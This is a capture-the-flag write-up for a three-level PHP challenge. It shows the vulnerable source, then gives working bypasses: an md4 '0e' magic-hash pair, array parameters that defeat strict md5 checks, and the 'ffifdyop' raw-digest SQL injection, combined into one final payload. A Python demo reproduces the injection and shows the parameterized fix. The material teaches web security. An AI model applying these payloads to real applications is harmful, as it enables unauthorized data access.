<?php
include 'conn.php';
highlight_file("index.php");
//level 1
if ($_GET["hash1"] != hash("md4", $_GET["hash1"]))
{
die('level 1 failed');
}
//level 2
if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5($_GET['hash3']))
{
die('level 2 failed');
}
//level 3
$query = "SELECT * FROM flag WHERE password = '" . md5($_GET["hash4"],true) . "'";
$result = $mysqli->query($query);
$row = $result->fetch_assoc();
var_dump($row);
$result->free();
$mysqli->close();
?>
Three levels, three bypasses: a loose-comparison bypass of md4, a strict-comparison bypass of md5, and an SQL injection through a raw md5 digest.
1. md4 bypass (loose comparison)
if ($_GET["hash1"] != hash("md4", $_GET["hash1"]))
{
die('level 1 failed');
}
If $_GET["hash1"] != hash("md4", $_GET["hash1"]) the script exits, so to pass level 1 we need
$_GET["hash1"] == hash("md4", $_GET["hash1"])
under PHP's loose (==) comparison.
We were stuck here for a long, long time and got nowhere until a teammate found this article: https://medium.com/@Asm0d3us/part-1-php-tricks-in-web-ctf-challenges-e1981475b3e4
The trick is scientific notation: find a plaintext that itself looks like a number in scientific notation (0e followed only by digits) and whose MD4 hex digest also has the form 0e followed only by digits. Because == is a loose comparison, two numeric strings are compared as numbers, and any string of the form 0e<digits> evaluates to 0, so both sides compare equal and the check is bypassed. (This still holds on PHP 8, where two numeric strings are also compared numerically.)
A plaintext and digest pair that meets the condition (a so-called magic hash):
plaintext : 0e001233333333333334557778889
md4 hash : 0e434041524824285414215559233446
?hash1=0e001233333333333334557778889
This bypasses level 1.
2. md5 bypass (strict comparison)
if($_GET['hash2'] === $_GET['hash3'] || md5($_GET['hash2']) !== md5($_GET['hash3']))
{
die('level 2 failed');
}
This time the comparisons are strict (=== and !==), so the 0e trick does not help. Passing arrays does: hash2[]=1 and hash3[]=2 are two different arrays, so $_GET['hash2'] === $_GET['hash3'] is false, and on PHP 7 md5() given an array returns NULL (with a warning), so md5($_GET['hash2']) !== md5($_GET['hash3']) compares NULL with NULL and is also false. Both halves of the || are false and the level is passed. Note that on PHP 8 md5() throws a TypeError when given an array, so this step depends on the challenge running PHP 7.
?hash1=0e001233333333333334557778889&hash2[]=1&hash3[]=2
3. SQL injection through a raw md5 digest
$query = "SELECT * FROM flag WHERE password = '" . md5($_GET["hash4"],true) . "'";
$result = $mysqli->query($query);
$row = $result->fetch_assoc();
var_dump($row);
$result->free();
$mysqli->close();
The password is hashed with md5($..., true), which returns the raw 16 digest bytes rather than the 32-character hex string, and those bytes are spliced straight into the query. The classic input ffifdyop has the md5 digest 276f722736c95d99e921722cf9ed621c, which as raw bytes reads 'or'6\xc9]\x99\xe9!r,\xf9\xedb\x1c (the non-printable bytes are lost when copied as text, which is why it is usually shown as 'or'6 ] !r, b). The closing quote from the query template ends the literal that opens after or, so the spliced statement becomes:
$query = "SELECT * FROM flag WHERE password = ''or'6<non-printable bytes>'";
MySQL converts the string '6...' to the number 6 in a boolean context, which is true, so the WHERE clause matches every row and var_dump prints the flag. The digest contains no further quote or backslash, so the statement stays syntactically valid.
https://blog.csdn.net/sinat_41380394/article/details/81490193
The final payload is as follows:
?hash1=0e001233333333333334557778889&hash2[]=1&hash3[]=2&hash4=ffifdyop
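As an added example for level 3 (not code from the write-up or the challenge), the following Python reproduces the splicing of md5($_GET["hash4"], true), runs the resulting statement against a constructed in-memory SQLite table standing in for the challenge's flag table (the real schema is not known; only a password column is implied), and shows the parameter-bound form beside it. SQLite, like MySQL, casts a string such as '6\xc9...' to the number 6 in a boolean context, which is what makes the injected `'' or '6...'` true for every row.

```python
import hashlib
import sqlite3

MAGIC = "ffifdyop"  # the classic input from the write-up


def raw_md5(s: str) -> bytes:
    """md5($s, true): the 16 raw digest bytes, not the 32-char hex string."""
    return hashlib.md5(s.encode()).digest()


def spliced_query(hash4: str) -> str:
    """Mirror of the challenge's concatenation. Each digest byte is decoded
    as latin-1 so it maps to exactly one character of the SQL text."""
    return ("SELECT * FROM flag WHERE password = '"
            + raw_md5(hash4).decode("latin-1") + "'")


def _demo_db() -> sqlite3.Connection:
    # Constructed stand-in for the challenge's `flag` table (assumption).
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE flag (password TEXT, flag TEXT)")
    con.execute("INSERT INTO flag VALUES (?, ?)",
                ("not-the-digest", "flag{constructed-sample}"))
    return con


def rows_matched_vulnerable(hash4: str) -> int:
    """Run the spliced statement unchanged. For ffifdyop the WHERE clause
    is `'' or '6...'`; '6...' casts to 6, so every row matches."""
    con = _demo_db()
    try:
        return len(con.execute(spliced_query(hash4)).fetchall())
    finally:
        con.close()


def rows_matched_fixed(hash4: str) -> int:
    """Hardened form: the digest is bound as a parameter and is never parsed
    as SQL, so the quote bytes inside it cannot change the statement."""
    con = _demo_db()
    try:
        digest = raw_md5(hash4).decode("latin-1")
        return len(con.execute(
            "SELECT * FROM flag WHERE password = ?", (digest,)).fetchall())
    finally:
        con.close()


def breaks_out(hash4: str) -> bool:
    """Heuristic for a usable input: digest starts with 'or' then a non-zero
    digit, and no later byte is a quote or backslash that would break the
    statement."""
    d = raw_md5(hash4)
    return (d[:4] == b"'or'" and d[4:5].isdigit() and d[4:5] != b"0"
            and b"'" not in d[4:] and b"\\" not in d[4:])


if __name__ == "__main__":
    print(raw_md5(MAGIC).hex())
    print(repr(spliced_query(MAGIC)))
    print("vulnerable rows:", rows_matched_vulnerable(MAGIC))
    print("fixed rows:", rows_matched_fixed(MAGIC))
```

Binding the digest as a parameter is the actual fix; the SQLite table is only a local stand-in, and the boolean cast of '6...' to 6 behaves the same way in MySQL, where the original challenge runs.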